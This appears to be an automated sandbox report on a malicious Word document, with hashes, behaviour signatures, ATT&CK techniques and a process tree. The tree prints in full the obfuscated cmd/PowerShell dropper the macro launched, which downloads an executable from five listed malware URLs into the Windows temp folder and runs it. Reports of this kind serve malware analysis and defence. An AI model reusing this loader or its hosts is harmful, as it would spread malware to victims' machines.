Analysis

  • max time kernel
    107s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-07-2022 09:13

General

  • Target

    c286bfa4a741ae1dfc7ae7176cb74166074510ec77835ee072b192d6bebae5f1.doc

  • Size

    267KB

  • MD5

    6609a251a692535a12a083f30c43681f

  • SHA1

    b5161effceeb06ee45aa1f52ac16fe716e0e2ea3

  • SHA256

    c286bfa4a741ae1dfc7ae7176cb74166074510ec77835ee072b192d6bebae5f1

  • SHA512

    bc2d7cd31d5b6fca690558e37859ac31022cfaf95d729bcf97b24c636a26a4714540adfbd8d1acacae53c7d22df7e292f602dabe9193acc8fc513e2d40174ce2

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://ishqekamil.com/ciY34zeKn3d

exe.dropper

http://cvlancer.com/CWvd8iMnLfj9C

exe.dropper

http://aucklandluxuryrealestatelistings.com/pHXewgm3qzll_3L

exe.dropper

http://nosomosgenios.com/cCZThGY1_wVKtkj23V

exe.dropper

http://2647403-1.web-hosting.es/blMc65Xgegv_YFDyjpRH

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c286bfa4a741ae1dfc7ae7176cb74166074510ec77835ee072b192d6bebae5f1.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3108
    • \??\c:\windows\system32\cmd.exe
      c:\windows\system32\cmd /c set _xxx=p&& set _yyy=owersh&& set _zzz=ell&& call %_xxx%%_yyy%%_zzz% $K5My4u = '$DrGHIly0c = new-obj0-10361093520ect -com0-10361093520obj0-10361093520ect wsc0-10361093520ript.she0-10361093520ll;$vh576j = new-object sys0-10361093520tem.net.web0-10361093520client;$xjFdD5Yz = new-object random;$GLC65c = \"0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://ishqekamil.com/ciY34zeKn3d,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://cvlancer.com/CWvd8iMnLfj9C,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://aucklandluxuryrealestatelistings.com/pHXewgm3qzll_3L,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://nosomosgenios.com/cCZThGY1_wVKtkj23V,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://2647403-1.web-hosting.es/blMc65Xgegv_YFDyjpRH\".spl0-10361093520it(\",\");$AvhcBOm = $xjFdD5Yz.nex0-10361093520t(1, 65536);$jauHDgE9o = \"c:\win0-10361093520dows\tem0-10361093520p\195.ex0-10361093520e\";for0-10361093520each($SGKszWC in $GLC65c){try{$vh576j.dow0-10361093520nlo0-10361093520adf0-10361093520ile($SGKszWC.ToS0-10361093520tring(), $jauHDgE9o);sta0-10361093520rt-pro0-10361093520cess $jauHDgE9o;break;}catch{}}'.replace('0-10361093520', $gZLbtF);$vaWgt0dZG = '';iex($K5My4u);
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:424
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $K5My4u = '$DrGHIly0c = new-obj0-10361093520ect -com0-10361093520obj0-10361093520ect wsc0-10361093520ript.she0-10361093520ll;$vh576j = new-object sys0-10361093520tem.net.web0-10361093520client;$xjFdD5Yz = new-object random;$GLC65c = \"0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://ishqekamil.com/ciY34zeKn3d,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://cvlancer.com/CWvd8iMnLfj9C,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://aucklandluxuryrealestatelistings.com/pHXewgm3qzll_3L,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://nosomosgenios.com/cCZThGY1_wVKtkj23V,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://2647403-1.web-hosting.es/blMc65Xgegv_YFDyjpRH\".spl0-10361093520it(\",\");$AvhcBOm = $xjFdD5Yz.nex0-10361093520t(1, 65536);$jauHDgE9o = \"c:\win0-10361093520dows\tem0-10361093520p\195.ex0-10361093520e\";for0-10361093520each($SGKszWC in $GLC65c){try{$vh576j.dow0-10361093520nlo0-10361093520adf0-10361093520ile($SGKszWC.ToS0-10361093520tring(), $jauHDgE9o);sta0-10361093520rt-pro0-10361093520cess $jauHDgE9o;break;}catch{}}'.replace('0-10361093520', $gZLbtF);$vaWgt0dZG = '';iex($K5My4u);
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:904
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k netsvcs -p
    1⤵
    • Drops file in System32 directory
    • Checks processor information in registry
    • Enumerates system info in registry
    PID:1480

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/424-138-0x0000000000000000-mapping.dmp
  • memory/904-142-0x00007FF840F00000-0x00007FF8419C1000-memory.dmp
    Filesize

    10.8MB

  • memory/904-141-0x00007FF840F00000-0x00007FF8419C1000-memory.dmp
    Filesize

    10.8MB

  • memory/904-140-0x000001DBED100000-0x000001DBED122000-memory.dmp
    Filesize

    136KB

  • memory/904-139-0x0000000000000000-mapping.dmp
  • memory/3108-134-0x00007FF82B590000-0x00007FF82B5A0000-memory.dmp
    Filesize

    64KB

  • memory/3108-136-0x00007FF828C30000-0x00007FF828C40000-memory.dmp
    Filesize

    64KB

  • memory/3108-132-0x00007FF82B590000-0x00007FF82B5A0000-memory.dmp
    Filesize

    64KB

  • memory/3108-137-0x000001D61F430000-0x000001D61F434000-memory.dmp
    Filesize

    16KB

  • memory/3108-135-0x00007FF828C30000-0x00007FF828C40000-memory.dmp
    Filesize

    64KB

  • memory/3108-133-0x00007FF82B590000-0x00007FF82B5A0000-memory.dmp
    Filesize

    64KB

  • memory/3108-131-0x00007FF82B590000-0x00007FF82B5A0000-memory.dmp
    Filesize

    64KB

  • memory/3108-130-0x00007FF82B590000-0x00007FF82B5A0000-memory.dmp
    Filesize

    64KB

  • memory/3108-144-0x00007FF82B590000-0x00007FF82B5A0000-memory.dmp
    Filesize

    64KB

  • memory/3108-145-0x00007FF82B590000-0x00007FF82B5A0000-memory.dmp
    Filesize

    64KB

  • memory/3108-146-0x00007FF82B590000-0x00007FF82B5A0000-memory.dmp
    Filesize

    64KB

  • memory/3108-147-0x00007FF82B590000-0x00007FF82B5A0000-memory.dmp
    Filesize

    64KB